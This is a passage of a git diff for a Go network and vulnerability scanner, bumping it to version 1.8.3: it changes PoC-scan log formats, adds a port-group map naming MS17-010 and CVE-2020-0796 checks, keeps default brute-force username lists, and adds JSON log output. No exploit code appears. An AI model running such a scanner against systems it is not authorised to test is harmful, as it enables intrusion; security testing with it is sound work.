removeDuplicateElement(infoname) if len(infoname) > 0 { - result := fmt.Sprintf("[+] InfoScan: %-25v %s ", Url, infoname) + result := fmt.Sprintf("[+] InfoScan %-25v %s ", Url, infoname) common.LogSuccess(result) return infoname } diff --git a/WebScan/lib/check.go b/WebScan/lib/check.go index 94908490..14e8316d 100644 --- a/WebScan/lib/check.go +++ b/WebScan/lib/check.go @@ -33,7 +33,7 @@ func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) { for task := range tasks { isVul, _, name := executePoc(task.Req, task.Poc) if isVul { - result := fmt.Sprintf("[+] PocScan: %s %s %s", task.Req.URL, task.Poc.Name, name) + result := fmt.Sprintf("[+] PocScan %s %s %s", task.Req.URL, task.Poc.Name, name) common.LogSuccess(result) } wg.Done() @@ -149,7 +149,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) { // 先判断响应页面是否匹配search规则 if rule.Search != "" { result := doSearch(rule.Search, GetHeader(resp.Headers)+string(resp.Body)) - if result != nil && len(result) > 0 { // 正则匹配成功 + if len(result) > 0 { // 正则匹配成功 for k, v := range result { variableMap[k] = v } @@ -161,7 +161,6 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) { if err != nil { return false, err } - //fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName())) //如果false不继续执行后续rule // 如果最后一步执行失败,就算前面成功了最终依旧是失败 flag, ok = out.Value().(bool) @@ -354,15 +353,15 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{}, if success { if rule.Continue { if p.Name == "poc-yaml-backup-file" || p.Name == "poc-yaml-sql-file" { - common.LogSuccess(fmt.Sprintf("[+] PocScan: %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name)) + common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name)) } else { - common.LogSuccess(fmt.Sprintf("[+] PocScan: %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap)) + common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap)) } continue } strMap = append(strMap, tmpMap...) if i == len(p.Rules)-1 { - common.LogSuccess(fmt.Sprintf("[+] PocScan: %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap)) + common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap)) //防止后续继续打印poc成功信息 return false, nil } diff --git a/common/config.go b/common/config.go index 00f93b49..8ff2b575 100644 --- a/common/config.go +++ b/common/config.go @@ -1,6 +1,6 @@ package common -var version = "1.8.2" +var version = "1.8.3" var Userdict = map[string][]string{ "ftp": {"ftp", "admin", "www", "web", "root", "db", "wwwroot", "data"}, "mysql": {"root", "mysql"}, @@ -41,7 +41,29 @@ var PORTList = map[string]int{ "icmp": 0, "main": 0, } - +var PortGroup = map[string]string{ + "ftp": "21", + "ssh": "22", + "findnet": "135", + "netbios": "139", + "smb": "445", + "mssql": "1433", + "oracle": "1521", + "mysql": "3306", + "rdp": "3389", + "psql": "5432", + "redis": "6379", + "fcgi": "9000", + "mem": "11211", + "mgo": "27017", + "ms17010": "445", + "cve20200796": "445", + "service": "21,22,135,139,445,1433,1521,3306,3389,5432,6379,9000,11211,27017", + "db": "1433,1521,3306,5432,6379,11211,27017", + "web": "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880", + "all": "1-65535", + "main": "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017", +} var Outputfile = "result.txt" var IsSave = true var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880" diff --git a/common/flag.go b/common/flag.go index 4a35a744..c5873863 100644 --- a/common/flag.go +++ b/common/flag.go @@ -66,5 +66,6 @@ func Flag(Info *HostInfo) { flag.BoolVar(&IsWmi, "wmi", false, "start wmi") flag.StringVar(&Hash, "hash", "", "hash") flag.BoolVar(&Noredistest, "noredis", false, "no redis sec test") + flag.BoolVar(&JsonOutput, "json", false, "json output") flag.Parse() } diff --git a/common/log.go b/common/log.go index 1bb0204f..9c416629 100644 --- a/common/log.go +++ b/common/log.go @@ -1,6 +1,7 @@ package common import ( + "encoding/json" "fmt" "github.com/fatih/color" "os" @@ -18,8 +19,14 @@ var LogErrTime int64 var WaitTime int64 var Silent bool var Nocolor bool +var JsonOutput bool var LogWG sync.WaitGroup +type JsonText struct { + Type string `json:"type"` + Text string `json:"text"` +} + func init() { LogSucTime = time.Now().Unix() go SaveLog() @@ -54,13 +61,50 @@ func SaveLog() { } func WriteFile(result string, filename string) { - var text = []byte(result + "\n") fl, err := os.OpenFile(filename, os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0666) if err != nil { fmt.Printf("Open %s error, %v\n", filename, err) return } - _, err = fl.Write(text) + if JsonOutput { + var scantype string + var text string + if strings.HasPrefix(result, "[+]") || strings.HasPrefix(result, "[*]") || strings.HasPrefix(result, "[-]") { + //找到第二个空格的位置 + index := strings.Index(result[4:], " ") + if index == -1 { + scantype = "msg" + text = result[4:] + } else { + scantype = result[4 : 4+index] + text = result[4+index+1:] + } + } else { + scantype = "msg" + text = result + } + jsonText := JsonText{ + Type: scantype, + Text: text, + } + jsonData, err := json.Marshal(jsonText) + if err != nil { + fmt.Println(err) + jsonText = JsonText{ + Type: "msg", + Text: result, + } + jsonData, err = json.Marshal(jsonText) + if err != nil { + fmt.Println(err) + jsonData = []byte(result) + } + } + jsonData = append(jsonData, []byte(",\n")...) + _, err = fl.Write(jsonData) + } else { + _, err = fl.Write([]byte(result + "\n")) + } fl.Close() if err != nil { fmt.Printf("Write %s error, %v\n", filename, err) diff --git a/main.go b/main.go index 0ae3db36..dfb3c7f4 100644 --- a/main.go +++ b/main.go @@ -13,6 +13,6 @@ func main() { common.Flag(&Info) common.Parse(&Info) Plugins.Scan(Info) - t := time.Now().Sub(start) + t := time.Since(start) fmt.Printf("[*] 扫描结束,耗时: %s\n", t) }